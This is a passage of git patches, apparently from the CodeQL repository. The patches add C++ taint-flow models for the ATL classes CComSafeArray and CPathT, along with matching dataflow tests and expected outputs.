"Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "GetUpperBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComSafeArray", True, "MultiDimGetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "Argument[*@1]", "value", "manual"] + - ["", "CComSafeArray", True, "MultiDimSetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["", "CComSafeArray", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["", "CComSafeArray", True, "operator LPSAFEARRAY", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "operator[]", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index a91cd9c88d6..69a79eb7580 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -572,10 +572,10 @@ void test_CComSafeArray() { sink(safe->pvData); // $ ir { CComSafeArray c(safe); - sink(c[0]); // $ MISSING: ir - sink(c.GetAt(0)); // $ MISSING: ir - sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir - sink(c.m_psa->pvData); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir + sink(c.m_psa->pvData); // $ ir } { CComSafeArray c; @@ -583,22 +583,22 @@ void test_CComSafeArray() { sink(c.GetAt(0)); sink(c.GetSafeArrayPtr()->pvData); c.Add(safe); - sink(c[0]); // $ MISSING: ir - sink(c.GetAt(0)); // $ MISSING: ir - sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir - sink(static_cast(c)->pvData); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir + sink(static_cast(c)->pvData); // $ ir } { CComSafeArray c; c.Add(source(), true); - sink(c[0]); // $ MISSING: ir - sink(c.GetAt(0)); // $ MISSING: ir - sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir } { CComSafeArray c; c.SetAt(0, source(), true); - sink(c[0]); // $ MISSING: ir - sink(c[0L]); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c[0L]); // $ ir } } From 1a79290fd67fe3da4abe481e243c64c9a02f0589 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:12:37 +0000 Subject: [PATCH 0733/1267] C++: Add failing tests with 'CPathT'. --- .../dataflow/taint-tests/atl.cpp | 104 ++++++++ .../dataflow/taint-tests/localTaint.expected | 248 ++++++++++++------ 2 files changed, 267 insertions(+), 85 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 69a79eb7580..35a66099a62 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -602,3 +602,107 @@ void test_CComSafeArray() { sink(c[0L]); // $ ir } } + +template +struct CPathT { + typedef StringType PCXSTR; // simplified + CPathT(PCXSTR pszPath); + CPathT(const CPathT& path); + CPathT() throw(); + + void AddBackslash(); + BOOL AddExtension(PCXSTR pszExtension); + BOOL Append(PCXSTR pszMore); + void BuildRoot(int iDrive); + void Canonicalize(); + void Combine(PCXSTR pszDir, PCXSTR pszFile); + CPathT CommonPrefix(PCXSTR pszOther); + BOOL CompactPathEx(UINT nMaxChars, DWORD dwFlags); + BOOL FileExists() const; + int FindExtension() const; + int FindFileName() const; + int GetDriveNumber() const; + StringType GetExtension() const; + BOOL IsDirectory() const; + BOOL IsFileSpec() const; + BOOL IsPrefix(PCXSTR pszPrefix) const; + BOOL IsRelative() const; + BOOL IsRoot() const; + BOOL IsSameRoot(PCXSTR pszOther) const; + BOOL IsUNC() const; + BOOL IsUNCServer() const; + BOOL IsUNCServerShare() const; + BOOL MakePretty(); + BOOL MatchSpec(PCXSTR pszSpec) const; + void QuoteSpaces(); + BOOL RelativePathTo( + PCXSTR pszFrom, + DWORD dwAttrFrom, + PCXSTR pszTo, + DWORD dwAttrTo); + void RemoveArgs(); + void RemoveBackslash(); + void RemoveBlanks(); + void RemoveExtension(); + BOOL RemoveFileSpec(); + BOOL RenameExtension(PCXSTR pszExtension); + int SkipRoot() const; + void StripPath(); + BOOL StripToRoot(); + void UnquoteSpaces(); + operator const StringType&() const throw(); + operator PCXSTR() const throw(); + operator StringType&() throw(); + CPathT& operator+=(PCXSTR pszMore); + + StringType m_strPath; +}; + +using CPath = CPathT; + +void test_CPathT() { + char* x = indirect_source(); + CPath p(x); + sink(static_cast(p)); // $ MISSING: ir + sink(p.m_strPath); // $ MISSING: ir + + CPath p2(p); + sink(p2.m_strPath); // $ MISSING: ir + + { + CPath p; + p.AddExtension(x); + sink(p.m_strPath); // $ MISSING: ir + } + { + CPath p; + p.Append(x); + sink(p.m_strPath); // $ MISSING: ir + + CPath p2; + p2 += p; + sink(p.m_strPath); // $ MISSING: ir + + CPath p3; + p3 += x; + sink(p.m_strPath); // $ MISSING: ir + } + + { + CPath p; + p.Combine(x, nullptr); + sink(p.m_strPath); // $ MISSING: ir + } + { + CPath p; + p.Combine(nullptr, x); + sink(p.m_strPath); // $ MISSING: ir + } + + { + CPath p; + auto p2 = p.CommonPrefix(x); + sink(p2.m_strPath); // $ MISSING: ir + sink(p2.GetExtension()); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 4924d7d817f..961011dbd23 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -636,92 +636,170 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | | atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | -| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:570:8:570:11 | safe | | -| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:572:24:572:27 | safe | | -| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:582:11:582:14 | safe | | -| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:572:24:572:27 | safe | | -| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:582:11:582:14 | safe | | -| atl.cpp:572:24:572:27 | safe | atl.cpp:572:24:572:28 | call to CComSafeArray | TAINT | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:573:8:573:8 | c | | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:574:8:574:8 | c | | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:576:3:576:3 | c | | -| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:574:8:574:8 | c | | -| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:575:8:575:8 | c | | -| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:576:3:576:3 | c | | -| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:575:8:575:8 | c | | -| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:576:3:576:3 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:3:576:3 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:579:10:579:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:580:10:580:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:581:10:581:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:582:5:582:5 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:586:35:586:35 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:587:3:587:3 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:580:10:580:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:581:10:581:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:582:5:582:5 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:581:10:581:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:582:5:582:5 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:582:5:582:5 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:572:8:572:11 | safe | | +| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:574:24:574:27 | safe | | +| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:585:11:585:14 | safe | | +| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:574:24:574:27 | safe | | +| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:585:11:585:14 | safe | | +| atl.cpp:574:24:574:27 | safe | atl.cpp:574:24:574:28 | call to CComSafeArray | TAINT | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:576:8:576:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:579:3:579:3 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:8:576:8 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:577:8:577:8 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:578:8:578:8 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:577:8:577:8 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:578:8:578:8 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:578:8:578:8 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:578:8:578:8 | c [post update] | atl.cpp:579:3:579:3 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:582:10:582:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:585:5:585:5 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:586:10:586:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:587:10:587:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:589:35:589:35 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:590:3:590:3 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:585:5:585:5 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:590:3:590:3 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:586:35:586:35 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:590:5:590:5 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:591:10:591:10 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:592:10:592:10 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:593:10:593:10 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:594:3:594:3 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:591:10:591:10 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:592:10:592:10 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:593:10:593:10 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:592:10:592:10 | c | | -| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:593:10:593:10 | c | | -| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:593:10:593:10 | c | | -| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:593:10:593:10 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:597:5:597:5 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:598:10:598:10 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:599:10:599:10 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:600:3:600:3 | c | | -| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:598:10:598:10 | c | | -| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:599:10:599:10 | c | | -| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:600:3:600:3 | c | | -| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:599:10:599:10 | c | | -| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:600:3:600:3 | c | | -| atl.cpp:599:10:599:10 | ref arg c | atl.cpp:600:3:600:3 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:5:585:5 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:5:585:5 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:589:35:589:35 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:593:5:593:5 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:594:10:594:10 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:595:10:595:10 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:597:3:597:3 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:594:10:594:10 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:595:10:595:10 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:595:10:595:10 | c | | +| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:600:5:600:5 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:601:10:601:10 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:602:10:602:10 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:603:3:603:3 | c | | +| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:601:10:601:10 | c | | +| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:602:10:602:10 | c | | +| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:603:3:603:3 | c | | +| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:602:10:602:10 | c | | +| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:603:3:603:3 | c | | +| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:603:3:603:3 | c | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:665:11:665:11 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:674:20:674:20 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:679:14:679:14 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:687:11:687:11 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:693:15:693:15 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:698:24:698:24 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:704:30:704:30 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:674:20:674:20 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:679:14:679:14 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:687:11:687:11 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:665:11:665:11 | x | atl.cpp:665:11:665:12 | call to CPathT | TAINT | +| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:666:27:666:27 | p | | +| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:667:8:667:8 | p | | +| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:669:12:669:12 | p | | +| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:667:8:667:8 | p | | +| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:669:12:669:12 | p | | +| atl.cpp:667:8:667:8 | p [post update] | atl.cpp:669:12:669:12 | p | | +| atl.cpp:667:10:667:18 | ref arg m_strPath | atl.cpp:670:11:670:19 | m_strPath | | +| atl.cpp:669:12:669:12 | p | atl.cpp:669:12:669:13 | call to CPathT | | +| atl.cpp:669:12:669:13 | call to CPathT | atl.cpp:670:8:670:9 | p2 | | +| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:674:5:674:5 | p | | +| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:675:10:675:10 | p | | +| atl.cpp:674:5:674:5 | ref arg p | atl.cpp:675:10:675:10 | p | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:679:14:679:14 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:687:11:687:11 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:679:5:679:5 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:680:10:680:10 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:683:11:683:11 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:684:10:684:10 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:688:10:688:10 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:680:10:680:10 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:683:11:683:11 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:684:10:684:10 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:688:10:688:10 | p | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:687:11:687:11 | x | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:683:11:683:11 | p | | +| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:684:10:684:10 | p | | +| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:688:10:688:10 | p | | +| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:684:12:684:20 | m_strPath | | +| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | +| atl.cpp:682:11:682:12 | call to CPathT | atl.cpp:683:5:683:6 | p2 | | +| atl.cpp:683:11:683:11 | call to operator char *& | atl.cpp:683:8:683:8 | call to operator+= | TAINT | +| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:684:10:684:10 | p | | +| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:688:10:688:10 | p | | +| atl.cpp:684:10:684:10 | p [post update] | atl.cpp:688:10:688:10 | p | | +| atl.cpp:684:12:684:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | +| atl.cpp:686:11:686:12 | call to CPathT | atl.cpp:687:5:687:6 | p3 | | +| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:687:11:687:11 | x | atl.cpp:687:8:687:8 | call to operator+= | TAINT | +| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:693:5:693:5 | p | | +| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:694:10:694:10 | p | | +| atl.cpp:693:5:693:5 | ref arg p | atl.cpp:694:10:694:10 | p | | +| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:698:5:698:5 | p | | +| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:699:10:699:10 | p | | +| atl.cpp:698:5:698:5 | ref arg p | atl.cpp:699:10:699:10 | p | | +| atl.cpp:698:24:698:24 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:703:11:703:11 | call to CPathT | atl.cpp:704:15:704:15 | p | | +| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:705:10:705:11 | p2 | | +| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | +| atl.cpp:705:10:705:11 | p2 [post update] | atl.cpp:706:10:706:11 | p2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 354361952ac6d4e8571a7b06e0f487c93fb7070b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:15:17 +0000 Subject: [PATCH 0734/1267] C++: Add MaD model for 'CPathT'. --- cpp/ql/lib/ext/CPathT.model.yml | 22 +++++++++++++++++++ 